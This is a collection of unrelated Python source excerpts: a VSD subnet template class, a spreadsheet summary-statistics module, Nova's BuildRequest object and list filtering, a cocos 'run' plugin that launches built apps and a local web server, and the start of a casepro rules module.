When set, VRS will act as ARP Proxy
This attribute is named `proxyARP` in VSD API.
"""
return self._proxy_arp
@proxy_arp.setter
def proxy_arp(self, value):
""" Set proxy_arp value.
Notes:
When set, VRS will act as ARP Proxy
This attribute is named `proxyARP` in VSD API.
"""
self._proxy_arp = value
@property
def use_global_mac(self):
""" Get use_global_mac value.
Notes:
if this flag is enabled, the system configured globalMACAddress will be used as the gateway mac address
This attribute is named `useGlobalMAC` in VSD API.
"""
return self._use_global_mac
@use_global_mac.setter
def use_global_mac(self, value):
""" Set use_global_mac value.
Notes:
if this flag is enabled, the system configured globalMACAddress will be used as the gateway mac address
This attribute is named `useGlobalMAC` in VSD API.
"""
self._use_global_mac = value
@property
def associated_multicast_channel_map_id(self):
""" Get associated_multicast_channel_map_id value.
Notes:
The ID of the Multi Cast Channel Map this Subnet/Subnet Template is associated with. This has to be set when enableMultiCast is set to ENABLED
This attribute is named `associatedMulticastChannelMapID` in VSD API.
"""
return self._associated_multicast_channel_map_id
@associated_multicast_channel_map_id.setter
def associated_multicast_channel_map_id(self, value):
""" Set associated_multicast_channel_map_id value.
Notes:
The ID of the Multi Cast Channel Map this Subnet/Subnet Template is associated with. This has to be set when enableMultiCast is set to ENABLED
This attribute is named `associatedMulticastChannelMapID` in VSD API.
"""
self._associated_multicast_channel_map_id = value
@property
def dual_stack_dynamic_ip_allocation(self):
""" Get dual_stack_dynamic_ip_allocation value.
Notes:
This value indicates whether dynamic address allocation is enabled or not. This will be applicable when subnet template is in dual stack mode
This attribute is named `dualStackDynamicIPAllocation` in VSD API.
"""
return self._dual_stack_dynamic_ip_allocation
@dual_stack_dynamic_ip_allocation.setter
def dual_stack_dynamic_ip_allocation(self, value):
""" Set dual_stack_dynamic_ip_allocation value.
Notes:
This value indicates whether dynamic address allocation is enabled or not. This will be applicable when subnet template is in dual stack mode
This attribute is named `dualStackDynamicIPAllocation` in VSD API.
"""
self._dual_stack_dynamic_ip_allocation = value
@property
def multicast(self):
""" Get multicast value.
Notes:
Indicates multicast policy on Subnet/Subnet Template.
"""
return self._multicast
@multicast.setter
def multicast(self, value):
""" Set multicast value.
Notes:
Indicates multicast policy on Subnet/Subnet Template.
"""
self._multicast = value
@property
def owner(self):
""" Get owner value.
Notes:
Identifies the user that has created this object.
"""
return self._owner
@owner.setter
def owner(self, value):
""" Set owner value.
Notes:
Identifies the user that has created this object.
"""
self._owner = value
@property
def external_id(self):
""" Get external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
return self._external_id
@external_id.setter
def external_id(self, value):
""" Set external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
self._external_id = value
## Custom methods
def is_template(self):
""" Verify that the object is a template
Returns:
(bool): True if the object is a template
"""
return True
def is_from_template(self):
""" Verify if the object has been instantiated from a template
Note:
The object has to be fetched. Otherwise, it does not
have information from its parent
Returns:
(bool): True if the object has been instantiated from a template
"""
return False
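# Usage sketch (illustrative; a connected bambou session is assumed and not
# shown in this file):
#
#   template = NUSubnetTemplate(name=u'web-tier', netmask=u'255.255.255.0')
#   template.ip_type = NUSubnetTemplate.CONST_IP_TYPE_IPV4
#   # Once fetched from VSD, child objects are reachable through the
#   # fetchers wired up in __init__, e.g. template.subnets.fetch()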
|
|
import datetime
import pandas as pd
from xlsxwriter.workbook import Workbook
from paperpusher import spreadsheet
class SummaryVariable():
"""Directions for how to summarize a given varaible
Attributes:
name: The summary variable's name
variables: a list of variables
methods: [list] A list of string method names
groups : [list] a list of Group objects applied to this summary variable
method_spreadsheet_columns: [dictionary] dictionary in the form
{"method_name" : column number}
where the column number corresponds to the column of the method name in the spreadsheet
subheader_row_num : [int] subheader row number in the worksheet
last_group_row_num : [int] row number of the last group in the worksheet
"""
def __init__(self, name, variables = None, methods = None):
self.name = name
# None defaults avoid sharing one mutable list across all instances.
self.variables = variables if variables is not None else [] # a list of variables
self.methods = methods if methods is not None else []
self.method_spreadsheet_columns = {}
self.groups = []
def apply_method(self, data_frame, method_name, group):
"""Applied the method specified by string to this variable
Args:
data_frame: A pandas dataframe object
method_name: string representing one of the SummaryVariable analytic methods
group : [Group] a group to subset the data frame by
Returns:
The return value of the specified method. If no method matches
the string, returns None.
"""
# total number of observations before subsetting by applying group condition
total_num_observations = len(data_frame.index)
# apply groups
data_frame = self.apply_group(data_frame, group)
if method_name == "min":
return self.min(data_frame)
elif method_name == "max":
return self.max(data_frame)
elif method_name == "mean":
return self.mean(data_frame)
elif method_name == "median":
return self.median(data_frame)
elif method_name == "sum":
return self.sum(data_frame)
elif method_name == "percent_of_sum":
return self.percent_of_sum(data_frame)
elif method_name == "percent_of_average":
return self.percent_of_average(data_frame)
elif method_name == "percent_of_obs":
return self.percent_of_obs(data_frame, total_num_observations)
elif method_name == "percent_of_group":
return self.percent_of_group(data_frame)
return None
def apply_group(self, data_frame, group):
"""Returns a subset of the data frame based on the groups specified
Args:
data_frame: Pandas data frame
group : [Group] a group object
Returns:
A subset of the pandas data frame. If the group is not a subset, the original data_frame is returned unchanged
"""
if group.is_subset:
if group.variable_must_be == "equal":
data_frame = data_frame[data_frame[group.variable_name] == group.variable_values[0]]
elif group.variable_must_be == "less_than":
data_frame = data_frame[data_frame[group.variable_name] < group.variable_values[0]]
elif group.variable_must_be == "greater_than_equal_to":
data_frame = data_frame[data_frame[group.variable_name] >= group.variable_values[0]]
return data_frame
def get_method_display_name(self, method_name):
"""Returns a user friendly display name for the method
Args:
method_name: a string method name corresponding to a summary method
Returns:
A friendly method display name
"""
if method_name == "min":
return "Minimum"
elif method_name == "max":
return "Maximum"
elif method_name == "mean":
return "Average"
elif method_name == "median":
return "Median"
elif method_name == "sum":
return "Sum"
elif method_name == "percent_of_sum" or method_name == "percent_of_average":
return "Percent of " + self.variables[1]
elif method_name == "percent_of_obs":
return "Percent of observations"
elif method_name == "percent_of_group":
return "Percent of group"
return method_name
# evaluative methods
def min(self, data_frame):
return data_frame[self.variables[0]].min()
def max(self, data_frame):
return data_frame[self.variables[0]].max()
def mean(self, data_frame):
return data_frame[self.variables[0]].mean()
def median(self, data_frame):
return data_frame[self.variables[0]].median()
def sum(self, data_frame):
return data_frame[self.variables[0]].sum()
def percent_of_sum(self, data_frame):
"""Returns sum of variable[0] divided by sum of variable[1]
"""
sum_variable_one = data_frame[self.variables[0]].sum()
sum_variable_two = data_frame[self.variables[1]].sum()
# Guard against division by zero.
if sum_variable_two != 0:
return (sum_variable_one/sum_variable_two)*100
return "---"
def percent_of_average(self, data_frame):
"""Returns the average of variable[0] divided by average of variable[1]
"""
average_variable_one = data_frame[self.variables[0]].mean()
average_variable_two = data_frame[self.variables[1]].mean()
# Guard against division by zero.
if average_variable_two != 0:
return (average_variable_one/average_variable_two)*100
return "---"
def percent_of_obs(self, data_frame, total_num_observations):
"""Returns the sum of variable[0] divided by the total number of
observations in the data frame before subsetting by groups
"""
sum_variable_one = data_frame[self.variables[0]].sum()
if total_num_observations > 0:
return (sum_variable_one/total_num_observations)*100
return "---"
def percent_of_group(self, data_frame):
"""Returns the sum of variable[0] divided by the number of observations in the group
"""
sum_variable_one = data_frame[self.variables[0]].sum()
group_observations = len(data_frame.index)
if group_observations > 0:
return (sum_variable_one/group_observations)*100
return "---"
class Group():
""" Directives to restrict a data frame based on group
Attributes:
name : [string] the name of the group
variable_must_be : [string] one of the must_be values
variable_values : [list] a list of values to be evaluated using the "variable_must_be" operator
is_subset : [boolean] indicates if the group is a subset of the data frame
"""
def __init__(self, name, variable_name, variable_must_be, variable_values = None, is_subset = True):
self.name = name
self.variable_name = variable_name
self.variable_must_be = variable_must_be
# None default avoids sharing one mutable list across all instances.
self.variable_values = variable_values if variable_values is not None else []
self.is_subset = is_subset
class BasicVariable():
"""Model for a basic, non-transformed, variable
Represents the model for a basic report variable, such as "First name" or "Sex".
Attributes:
name: The name of the variable, such as "First name". This name should correspond
with the header column name used in a user's spreadsheet.
data_type: The data type for this variable. Data types are
* date
* string
* integer
* float
* boolean
is_transform: A boolean attribute indicating whether this variable is a basic, unmodified
variable such as "First name", or if the variable requires some transformation - such
as being the composite of two or more variables or having some mathematical operation
performed on it.
"""
def __init__(self, name, data_type = None):
self.name = name
self.data_type = data_type
self.is_transform = False
def __str__(self):
return self.name
class TransformVariable(BasicVariable):
"""Model for a transformed variable
The TransformVariable extends the BasicVariable and represents a variable that is
either a composite or requires some type of mathematical transformation, using one
or more variables from a user's spreadsheet.
Attributes:
variables: A list of variable objects used to create the transformed variable
transform_method: A string indicating which transform method (one of the methods on this
TransformVariable object) that should be used. For example, "date_diff_days".
arguments: A list of arguments other than variable names to be passed to the transform method.
For example, using the "begins_with" method the arguments attribute might be ["begins with this?"]
"""
def __init__(self, name, data_type):
self.name = name
self.data_type = data_type
self.is_transform = True
self.variables = []
self.transform_method = None
self.arguments = []
def date_diff_days(self, oldest_date, newest_date):
"""
Compares two dates and returns the difference between them in days.
Args:
oldest_date: The oldest datetime object
newest_date: The newest datetime object
Returns:
Returns None if either date passed is not of type date, otherwise returns
an integer value indicating the number of days between the two dates.
"""
if type(oldest_date) is datetime.date and type(newest_date) is datetime.date:
date_diff = (newest_date - oldest_date).days
return date_diff
return None
def begins_with(self, cell_values, begins_with):
"""Determines if a set of cell contents begins with a given string.
Args:
cell_values: A list of cell values from a spreadsheet
begins_with: A string to check if each cell value begins with
Returns:
Returns an integer 1 to indicate all cells do begin with the passed value, an integer
0 to indicate one or more of the cells do not begin with the passed value, and returns
None if one or more of the passed cell_values is None.
"""
begins_with = str.lower(begins_with)
for cell_value in cell_values:
# Check for None before lowercasing, which would raise a TypeError.
if cell_value is None:
return None
cell_value = str.lower(cell_value)
if not cell_value.startswith(begins_with):
return 0
return 1
def not_empty(self, cell_values):
"""Determines if the contents of cell values are empty or not
If one of the cell values passed is empty, returns 0, otherwise
returns 1, indicating the cell values are not empty.
Args:
cell_values: A list of cell values from a spreadsheet.
Returns:
An integer (0 or 1) indicating a cell is not empty (1)
or is empty (0).
"""
for cell_value in cell_values:
# Check for None before calling string methods on the value.
if cell_value is None:
return 0
cell_value = str.lower(cell_value).strip()
if cell_value == "":
return 0
return 1
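# Transform sketch (dates are illustrative):
#
#   tv = TransformVariable("days_open", "integer")
#   tv.date_diff_days(datetime.date(2020, 1, 1), datetime.date(2020, 1, 31))
#   # -> 30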
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import re
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import versionutils
from oslo_versionedobjects import exception as ovoo_exc
from nova.db.api import api as api_db_api
from nova.db.api import models as api_models
from nova.db import utils as db_utils
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
LOG = logging.getLogger(__name__)
@base.NovaObjectRegistry.register
class BuildRequest(base.NovaObject):
# Version 1.0: Initial version
# Version 1.1: Added block_device_mappings
# Version 1.2: Added save() method
# Version 1.3: Added tags
VERSION = '1.3'
fields = {
'id': fields.IntegerField(),
'instance_uuid': fields.UUIDField(),
'project_id': fields.StringField(),
'instance': fields.ObjectField('Instance'),
'block_device_mappings': fields.ObjectField('BlockDeviceMappingList'),
# NOTE(alaski): Normally these would come from the NovaPersistentObject
# mixin but they're being set explicitly because we only need
# created_at/updated_at. There is no soft delete for this object.
'created_at': fields.DateTimeField(nullable=True),
'updated_at': fields.DateTimeField(nullable=True),
'tags': fields.ObjectField('TagList'),
}
def obj_make_compatible(self, primitive, target_version):
super(BuildRequest, self).obj_make_compatible(primitive,
target_version)
target_version = versionutils.convert_version_to_tuple(target_version)
if target_version < (1, 1) and 'block_device_mappings' in primitive:
del primitive['block_device_mappings']
elif target_version < (1, 3) and 'tags' in primitive:
del primitive['tags']
def _load_instance(self, db_instance):
# NOTE(alaski): Be very careful with instance loading because it
# changes more than most objects.
try:
self.instance = objects.Instance.obj_from_primitive(
jsonutils.loads(db_instance))
except TypeError:
LOG.debug('Failed to load instance from BuildRequest with uuid '
'%s because it is None', self.instance_uuid)
raise exception.BuildRequestNotFound(uuid=self.instance_uuid)
except ovoo_exc.IncompatibleObjectVersion:
# This should only happen if proper service upgrade strategies are
# not followed. Log the exception and raise BuildRequestNotFound.
# If the instance can't be loaded this object is useless and may
# as well not exist.
LOG.debug('Could not deserialize instance stored in BuildRequest '
'with uuid %(instance_uuid)s. Found version %(version)s '
'which is not supported here.',
dict(instance_uuid=self.instance_uuid,
version=jsonutils.loads(
db_instance)["nova_object.version"]))
LOG.exception('Could not deserialize instance in BuildRequest')
raise exception.BuildRequestNotFound(uuid=self.instance_uuid)
# NOTE(sbauza): The instance primitive should already have the deleted
# field being set, so when hydrating it back here, we should get the
# right value but in case we don't have it, let's suppose that the
# instance is not deleted, which is the default value for that field.
# NOTE(mriedem): Same for the "hidden" field.
self.instance.obj_set_defaults('deleted', 'hidden')
# NOTE(alaski): Set some fields on instance that are needed by the api,
# not lazy-loadable, and don't change.
self.instance.disable_terminate = False
self.instance.terminated_at = None
self.instance.host = None
self.instance.node = None
self.instance.launched_at = None
self.instance.launched_on = None
self.instance.cell_name = None
# The fields above are not set until the instance is in a cell at
# which point this BuildRequest will be gone. locked_by could
# potentially be set by an update so it should not be overwritten.
if not self.instance.obj_attr_is_set('locked_by'):
self.instance.locked_by = None
# created_at/updated_at are not on the serialized instance because it
# was never persisted.
self.instance.created_at = self.created_at
self.instance.updated_at = self.updated_at
self.instance.tags = self.tags
def _load_block_device_mappings(self, db_bdms):
# 'db_bdms' is a serialized BlockDeviceMappingList object. If it's None
# we're in a mixed version nova-api scenario and can't retrieve the
# actual list. Set it to an empty list here which will cause a
# temporary API inconsistency that will be resolved as soon as the
# instance is scheduled and on a compute.
if db_bdms is None:
LOG.debug('Failed to load block_device_mappings from BuildRequest '
'for instance %s because it is None', self.instance_uuid)
self.block_device_mappings = objects.BlockDeviceMappingList()
return
self.block_device_mappings = (
objects.BlockDeviceMappingList.obj_from_primitive(
jsonutils.loads(db_bdms)))
def _load_tags(self, db_tags):
# 'db_tags' is a serialized TagList object. If it's None
# we're in a mixed version nova-api scenario and can't retrieve the
# actual list. Set it to an empty list here which will cause a
# temporary API inconsistency that will be resolved as soon as the
# instance is scheduled and on a compute.
if db_tags is None:
LOG.debug('Failed to load tags from BuildRequest '
'for instance %s because it is None', self.instance_uuid)
self.tags = objects.TagList()
return
self.tags = (
objects.TagList.obj_from_primitive(
jsonutils.loads(db_tags)))
@staticmethod
def _from_db_object(context, req, db_req):
# Set this up front so that it can be pulled for error messages or
# logging at any point.
req.instance_uuid = db_req['instance_uuid']
for key in req.fields:
if key == 'instance':
continue
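# ObjectField columns are hydrated via per-field handlers resolved by
# name (e.g. 'tags' -> _load_tags), so adding a new ObjectField requires
# a matching _load_<field> method on this class.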
elif isinstance(req.fields[key], fields.ObjectField):
try:
getattr(req, '_load_%s' % key)(db_req[key])
except AttributeError:
LOG.exception('No load handler for %s', key)
else:
setattr(req, key, db_req[key])
# Load instance last because other fields on req may be referenced
req._load_instance(db_req['instance'])
req.obj_reset_changes(recursive=True)
req._context = context
return req
@staticmethod
@api_db_api.context_manager.reader
def _get_by_instance_uuid_from_db(context, instance_uuid):
db_req = context.session.query(api_models.BuildRequest).filter_by(
instance_uuid=instance_uuid).first()
if not db_req:
raise exception.BuildRequestNotFound(uuid=instance_uuid)
return db_req
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid):
db_req = cls._get_by_instance_uuid_from_db(context, instance_uuid)
return cls._from_db_object(context, cls(), db_req)
@staticmethod
@api_db_api.context_manager.writer
def _create_in_db(context, updates):
db_req = api_models.BuildRequest()
db_req.update(updates)
db_req.save(context.session)
return db_req
def _get_update_primitives(self):
updates = self.obj_get_changes()
for key, value in updates.items():
if isinstance(self.fields[key], fields.ObjectField):
updates[key] = jsonutils.dumps(value.obj_to_primitive())
return updates
@base.remotable
def create(self):
if self.obj_attr_is_set('id'):
raise exception.ObjectActionError(action='create',
reason='already created')
if not self.obj_attr_is_set('instance_uuid'):
# We can't guarantee this is not null in the db so check here
raise exception.ObjectActionError(action='create',
reason='instance_uuid must be set')
updates = self._get_update_primitives()
db_req = self._create_in_db(self._context, updates)
self._from_db_object(self._context, self, db_req)
@staticmethod
@api_db_api.context_manager.writer
def _destroy_in_db(context, instance_uuid):
result = context.session.query(api_models.BuildRequest).filter_by(
instance_uuid=instance_uuid).delete()
if not result:
raise exception.BuildRequestNotFound(uuid=instance_uuid)
@base.remotable
def destroy(self):
self._destroy_in_db(self._context, self.instance_uuid)
@api_db_api.context_manager.writer
def _save_in_db(self, context, req_id, updates):
db_req = context.session.query(
api_models.BuildRequest).filter_by(id=req_id).first()
if not db_req:
raise exception.BuildRequestNotFound(uuid=self.instance_uuid)
db_req.update(updates)
context.session.add(db_req)
return db_req
@base.remotable
def save(self):
updates = self._get_update_primitives()
db_req = self._save_in_db(self._context, self.id, updates)
self._from_db_object(self._context, self, db_req)
def get_new_instance(self, context):
# NOTE(danms): This is a hack to make sure that the returned
# instance has all dirty fields. There are probably better
# ways to do this, but they kinda involve o.vo internals
# so this is okay for the moment.
instance = objects.Instance(context)
for field in self.instance.obj_fields:
# NOTE(danms): Don't copy the defaulted tags field
# as instance.create() won't handle it properly.
# TODO(zhengzhenyu): Handle this when the API supports creating
# servers with tags.
if field == 'tags':
continue
if self.instance.obj_attr_is_set(field):
setattr(instance, field, getattr(self.instance, field))
return instance
@base.NovaObjectRegistry.register
class BuildRequestList(base.ObjectListBase, base.NovaObject):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'objects': fields.ListOfObjectsField('BuildRequest'),
}
@staticmethod
@api_db_api.context_manager.reader
def _get_all_from_db(context):
query = context.session.query(api_models.BuildRequest)
if not context.is_admin:
query = query.filter_by(project_id=context.project_id)
db_reqs = query.all()
return db_reqs
@base.remotable_classmethod
def get_all(cls, context):
db_build_reqs = cls._get_all_from_db(context)
return base.obj_make_list(context, cls(context), objects.BuildRequest,
db_build_reqs)
@staticmethod
def _pass_exact_filters(instance, filters):
for filter_key, filter_val in filters.items():
if filter_key in ('metadata', 'system_metadata'):
if isinstance(filter_val, list):
for item in filter_val:
for k, v in item.items():
if (k not in instance.metadata or
v != instance.metadata[k]):
return False
else:
for k, v in filter_val.items():
if (k not in instance.metadata or
v != instance.metadata[k]):
return False
elif filter_key in (
'tags', 'tags-any', 'not-tags', 'not-tags-any'):
# Get the list of simple string tags first.
tags = ([tag.tag for tag in instance.tags]
if instance.tags else [])
if filter_key == 'tags':
for item in filter_val:
if item not in tags:
return False
elif filter_key == 'tags-any':
found = []
for item in filter_val:
if item in tags:
found.append(item)
if not found:
return False
elif filter_key == 'not-tags':
found = []
for item in filter_val:
if item in tags:
found.append(item)
if len(found) == len(filter_val):
return False
elif filter_key == 'not-tags-any':
for item in filter_val:
if item in tags:
return False
elif isinstance(filter_val, (list, tuple, set, frozenset)):
if not filter_val:
# Special value to indicate that nothing will match.
return None
if instance.get(filter_key, None) not in filter_val:
return False
else:
if instance.get(filter_key, None) != filter_val:
return False
return True
@staticmethod
def _pass_regex_filters(instance, filters):
for filter_name, filter_val in filters.items():
try:
instance_attr = getattr(instance, filter_name)
except AttributeError:
continue
# Sometimes the REGEX filter value is not a string
if not isinstance(filter_val, str):
filter_val = str(filter_val)
filter_re = re.compile(filter_val)
if instance_attr and not filter_re.search(str(instance_attr)):
return False
return True
@staticmethod
def _sort_build_requests(build_req_list, sort_keys, sort_dirs):
# build_req_list is a [] of build_reqs
sort_keys.reverse()
sort_dirs.reverse()
def sort_attr(sort_key, build_req):
if sort_key == 'id':
# 'id' is not set on the instance yet. Use the BuildRequest
# 'id' instead.
return build_req.id
return getattr(build_req.instance, sort_key)
for sort_key, sort_dir in zip(sort_keys, sort_dirs):
reverse = not sort_dir.lower().startswith('asc')
build_req_list.sort(key=functools.partial(sort_attr, sort_key),
reverse=reverse)
return build_req_list
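# Standalone sketch of the stable multi-key sort used above (names are
# illustrative): sorting by the least-significant key first and relying on
# Python's stable sort yields the combined ordering.
#
#   rows = [('b', 2), ('a', 2), ('a', 1)]
#   for key_idx, rev in [(1, True), (0, False)]:  # least-significant first
#       rows.sort(key=lambda r: r[key_idx], reverse=rev)
#   # rows == [('a', 2), ('a', 1), ('b', 2)]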
@base.remotable_classmethod
def get_by_filters(cls, context, filters, limit=None, marker=None,
sort_keys=None, sort_dirs=None):
# Short-circuit on anything that will not yield results.
# 'deleted' records can not be returned from here since build_requests
# are not soft deleted.
# 'cleaned' records won't exist as they would need to be deleted.
if (limit == 0 or
filters.get('deleted', False) or
filters.get('cleaned', False)):
# If we have a marker honor the MarkerNotFound semantics.
if marker:
raise exception.MarkerNotFound(marker=marker)
return cls(context, objects=[])
# Because the build_requests table stores an instance as a serialized
# versioned object it is not feasible to do the filtering and sorting
# in the database. Just get all potentially relevant records and
# process them here. It should be noted that build requests are short
# lived so there should not be a lot of results to deal with.
build_requests = cls.get_all(context)
# Fortunately some filters do not apply here.
# 'changes-since' works off of the updated_at field which has not yet
# been set at the point in the boot process where build_request still
# exists. So it can be ignored.
# 'deleted' and 'cleaned' are handled above.
sort_keys, sort_dirs = db_utils.process_sort_params(
sort_keys, sort_dirs, default_dir='desc')
# For other filters that don't match this, we will do regexp matching
# Taken from db/sqlalchemy/api.py
exact_match_filter_names = ['project_id', 'user_id', 'image_ref',
'vm_state', 'instance_type_id', 'uuid',
'metadata', 'host', 'task_state',
'system_metadata', 'tags', 'tags-any',
'not-tags', 'not-tags-any']
exact_filters = {}
regex_filters = {}
for key, value in filters.items():
if key in exact_match_filter_names:
exact_filters[key] = value
else:
regex_filters[key] = value
# As much as possible this copies the logic from db/sqlalchemy/api.py
# instance_get_all_by_filters_sort. The main difference is that method
# builds a sql query and this filters in python.
filtered_build_reqs = []
for build_req in build_requests:
instance = build_req.instance
filter_result = cls._pass_exact_filters(instance, exact_filters)
if filter_result is None:
# The filter condition is such that nothing will match.
# Bail early.
return cls(context, objects=[])
if filter_result is False:
continue
if not cls._pass_regex_filters(instance, regex_filters):
continue
filtered_build_reqs.append(build_req)
if (((len(filtered_build_reqs) < 2) or (not sort_keys)) and
not marker):
# No need to sort
return cls(context, objects=filtered_build_reqs)
sorted_build_reqs = cls._sort_build_requests(filtered_build_reqs,
sort_keys, sort_dirs)
marker_index = 0
if marker:
for i, build_req in enumerate(sorted_build_reqs):
if build_req.instance.uuid == marker:
# The marker is the last seen item in the last page, so
# we increment the index to the next item immediately
# after the marker so the marker is not returned.
marker_index = i + 1
break
else:
raise exception.MarkerNotFound(marker=marker)
len_build_reqs = len(sorted_build_reqs)
limit_index = len_build_reqs
if limit:
limit_index = marker_index + limit
if limit_index > len_build_reqs:
limit_index = len_build_reqs
return cls(context,
objects=sorted_build_reqs[marker_index:limit_index])
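# Pagination sketch for the marker/limit slicing above (uuids illustrative):
# with sorted build requests [u1, u2, u3, u4], marker=u2 and limit=2,
# marker_index lands just after u2 and the returned slice is [u3, u4].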
|
|
#!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "install" plugin
#
# Authr: Luis Parravicini
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"run" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
import sys
import os
import cocos
from MultiLanguage import MultiLanguage
import BaseHTTPServer
import webbrowser
import threading
class CCPluginRun(cocos.CCPlugin):
"""
Compiles a project and runs it on the target
"""
@staticmethod
def depends_on():
return ('deploy',)
@staticmethod
def plugin_name():
return "run"
@staticmethod
def brief_description():
return MultiLanguage.get_string('RUN_BRIEF')
def _add_custom_options(self, parser):
parser.add_argument("-m", "--mode", dest="mode", default='debug',
help=MultiLanguage.get_string('RUN_ARG_MODE'))
group = parser.add_argument_group(MultiLanguage.get_string('RUN_ARG_GROUP_WEB'))
group.add_argument("-b", "--browser", dest="browser",
help=MultiLanguage.get_string('RUN_ARG_BROWSER'))
group.add_argument("--param", dest="param",
help=MultiLanguage.get_string('RUN_ARG_PARAM'))
group.add_argument("--port", dest="port", metavar="SERVER_PORT", nargs='?',
help=MultiLanguage.get_string('RUN_ARG_PORT'))
group.add_argument("--host", dest="host", metavar="SERVER_HOST", nargs='?', default='127.0.0.1',
help=MultiLanguage.get_string('RUN_ARG_HOST'))
def _check_custom_options(self, args):
self._port = args.port
self._mode = args.mode
self._host = args.host
self._browser = args.browser
self._param = args.param
def get_ios_sim_name(self):
# get the version of xcodebuild
ver = cocos.get_xcode_version()
if ver.startswith("5"):
ret = "ios-sim-xcode5"
else:
ret = "ios-sim-xcode6"
return ret
def run_ios_sim(self, dependencies):
if not self._platforms.is_ios_active():
return
deploy_dep = dependencies['deploy']
if deploy_dep._use_sdk == 'iphoneos':
cocos.Logging.warning(MultiLanguage.get_string('RUN_WARNING_IOS_FOR_DEVICE_FMT',
os.path.dirname(deploy_dep._iosapp_path)))
else:
if getattr(sys, 'frozen', None):
cur_dir = os.path.realpath(os.path.dirname(sys.executable))
else:
cur_dir = os.path.realpath(os.path.dirname(__file__))
iossim_exe_path = os.path.join(cur_dir, 'bin', self.get_ios_sim_name())
launch_sim = "%s launch \"%s\" &" % (iossim_exe_path, deploy_dep._iosapp_path)
self._run_cmd(launch_sim)
def run_mac(self, dependencies):
if not self._platforms.is_mac_active():
return
deploy_dep = dependencies['deploy']
launch_macapp = '\"%s/Contents/MacOS/%s\"' % (deploy_dep._macapp_path, deploy_dep.target_name)
self._run_cmd(launch_macapp)
def run_android_device(self, dependencies):
if not self._platforms.is_android_active():
return
sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
adb_path = cocos.CMDRunner.convert_path_to_cmd(os.path.join(sdk_root, 'platform-tools', 'adb'))
deploy_dep = dependencies['deploy']
startapp = "%s shell am start -n \"%s/%s\"" % (adb_path, deploy_dep.package, deploy_dep.activity)
self._run_cmd(startapp)
def open_webbrowser(self, url):
if self._browser is None:
threading.Event().wait(1)
webbrowser.open_new(url)
else:
if cocos.os_is_mac():
if self._param is None:
url_cmd = "open -a \"%s\" \"%s\"" % (self._browser, url)
else:
url_cmd = "\"%s\" \"%s\" %s" % (self._browser, url, self._param)
else:
if self._param is None:
url_cmd = "\"%s\" %s" % (self._browser, url)
else:
url_cmd = "\"%s\" \"%s\" %s" % (self._browser, url, self._param)
self._run_cmd(url_cmd)
def run_web(self, dependencies):
if not self._platforms.is_web_active():
return
from SimpleHTTPServer import SimpleHTTPRequestHandler
HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"
HandlerClass.protocol_version = Protocol
host = self._host
if self._port is None:
port = 8000
port_max_add = 2000
else:
port = int(self._port)
port_max_add = 0
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
i = 0
httpd = None
base_port = port
while (i <= port_max_add):
# Try consecutive ports starting at base_port until one can be bound.
port = base_port + i
i += 1
server_address = (host, port)
try:
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_HOST_PORT_FMT', (host, port)))
httpd = ServerClass(server_address, HandlerClass)
except Exception as e:
httpd = None
cocos.Logging.warning(MultiLanguage.get_string('RUN_WARNING_SERVER_FAILED_FMT', (host, port, e)))
if httpd is not None:
break
if httpd is None:
raise cocos.CCPluginError(MultiLanguage.get_string('RUN_ERROR_START_SERVER_FAILED'),
cocos.CCPluginError.ERROR_OTHERS)
from threading import Thread
sub_url = deploy_dep.sub_url
url = 'http://%s:%s%s' % (host, port, sub_url)
thread = Thread(target = self.open_webbrowser, args = (url,))
thread.start()
sa = httpd.socket.getsockname()
with cocos.pushd(run_root):
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_SERVING_FMT', (sa[0], sa[1])))
httpd.serve_forever()
def run_win32(self, dependencies):
if not self._platforms.is_win32_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run_wp8(self, dependencies):
if not self._platforms.is_wp8_active():
return
deploy_dep = dependencies['deploy']
xap_path = deploy_dep.xap_path
deploy_tool = deploy_dep.deploy_tool
cmd = '"%s" /installlaunch "%s" /targetDevice:xd' % (deploy_tool, xap_path)
self._run_cmd(cmd)
def run_linux(self, dependencies):
if not self._platforms.is_linux_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run(self, argv, dependencies):
self.parse_args(argv)
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_START_APP'))
self.run_android_device(dependencies)
self.run_ios_sim(dependencies)
self.run_mac(dependencies)
self.run_web(dependencies)
self.run_win32(dependencies)
self.run_linux(dependencies)
self.run_wp8(dependencies)
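# Invocation sketch (flag names follow the parser above; platform selection
# comes from the cocos base plugin and is assumed here):
#
#   cocos run -m release --port 8000 -b "Google Chrome"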
|
|
import json
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from enum import Enum
import regex
from dash.orgs.models import Org
from dash.utils import get_obj_cacheable
from django.db import models
from django.utils.translation import ugettext_lazy as _
from casepro.contacts.models import Group
from casepro.msgs.models import Label, Message
from casepro.utils import json_encode, normalize
KEYWORD_REGEX = regex.compile(r"^\w[\w\- ]*\w$", flags=regex.UNICODE | regex.V0)
class Quantifier(Enum):
"""
Tests are typically composed of multiple conditions, e.g. contains ANY of X, Y or Z.
"""
NONE = (1, _("none of"))
